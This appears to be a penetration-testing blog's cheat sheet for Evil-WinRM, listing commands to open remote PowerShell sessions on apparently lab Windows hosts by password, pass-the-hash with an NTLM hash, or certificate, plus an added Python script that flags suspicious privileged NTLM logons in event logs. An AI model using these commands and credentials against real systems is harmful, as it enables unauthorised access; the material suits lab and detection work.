Tools | February 9, 2026 | 1 min read | by 0xt0pus

Evil-WinRM

Windows Remote Management shell for penetration testing with pass-the-hash support


Description

Evil-WinRM connects to Windows machines remotely through the WinRM service (port 5985 for HTTP, 5986 for HTTPS). It provides a PowerShell session on the target machine and is commonly used once valid credentials have been found.

Usage 1: Connect with Username and Password

Command:

evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Usage 2: Connect with NTLM Hash (Pass the Hash)

Command:

evil-winrm -i 10.10.11.42 -u "administrator" -H "3dc553ce4b9fd20bd016e098d2d2fd2e"
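
On the target, a hash-based logon like the one above is necessarily NTLM and is recorded as Security event 4624 with Logon Type 3 (network). The following Python is an added example, not part of the original page or of Evil-WinRM: it triages exported 4624 records for privileged NTLM network logons that originate outside a management subnet. The subnet, the privileged account list and the JSON-lines export layout are assumptions, and the sample events are constructed.

```python
import ipaddress
import json

# Assumption: the only subnet administrators are expected to manage servers from.
MGMT_NETS = [ipaddress.ip_network("192.0.2.0/28")]
# Assumption: account names treated as privileged in this environment.
PRIVILEGED = {"administrator", "svc_backup"}

# Constructed sample: Security event 4624 records exported as JSON lines.
SAMPLE_EVENTS = """\
{"EventID": 4624, "Computer": "SRV01", "TargetUserName": "Administrator", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "192.0.2.5"}
{"EventID": 4624, "Computer": "SRV01", "TargetUserName": "Administrator", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "198.51.100.77"}
{"EventID": 4624, "Computer": "SRV01", "TargetUserName": "Administrator", "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "198.51.100.77"}
{"EventID": 4624, "Computer": "SRV02", "TargetUserName": "jsmith", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "198.51.100.77"}
{"EventID": 4624, "Computer": "SRV02", "TargetUserName": "Administrator", "LogonType": 2, "AuthenticationPackageName": "Negotiate", "IpAddress": "-"}
"""


def from_mgmt(ip):
    """True if the source address lies inside a management subnet."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # "-" or empty when the event carries no source address
        return False
    return any(addr in net for net in MGMT_NETS)


def suspicious_ntlm_logons(lines):
    """Return (host, user, source) for privileged NTLM network logons from outside MGMT_NETS."""
    hits = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue  # only successful network logons
        if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
            continue  # a hash-based logon cannot use Kerberos
        user = ev.get("TargetUserName", "").lower()
        if user in PRIVILEGED and not from_mgmt(ev.get("IpAddress", "")):
            hits.append((ev["Computer"], user, ev.get("IpAddress")))
    return hits


if __name__ == "__main__":
    for host, user, src in suspicious_ntlm_logons(SAMPLE_EVENTS):
        print(f"review: NTLM network logon as {user} on {host} from {src}")
```

The event alone does not distinguish a password from a hash, so treat hits as leads to correlate with WinRM connections on 5985/5986 rather than as confirmed pass-the-hash.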

Usage 3: Connect with SSL Certificate

Used when certificate-based authentication is required: -S enables SSL, -c gives the path to the public certificate and -k the path to the private key.

Command:

evil-winrm -S -c cert.cert -k cert.pem -i timelapse.htb

Usage 4: Connect and Run Command

Command:

evil-winrm -i TARGET -u user -p pass -c 'whoami'